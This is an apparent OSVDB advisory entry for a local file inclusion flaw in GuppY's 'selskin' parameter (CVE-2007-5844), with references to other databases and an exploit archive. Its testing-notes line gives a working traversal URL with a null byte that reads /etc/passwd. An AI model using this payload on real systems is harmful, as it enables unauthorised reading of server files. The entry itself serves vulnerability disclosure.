GuppY inc/includes.inc selskin Variable Traversal Local File Inclusion

2007-11-03T00:00:00
ID OSVDB:38491
Type osvdb
Reporter OSVDB
Modified 2007-11-03T00:00:00

Description

Manual Testing Notes

http://[target]/[path]/index.php?selskin=..%2F..%2F..%2F..%2F.%2Fetc%2Fpasswd%00

References:

ISS X-Force ID: 38255 Generic Exploit URL: http://www.milw0rm.com/exploits/4602 FrSIRT Advisory: ADV-2007-3750 CVE-2007-5844 Bugtraq ID: 26315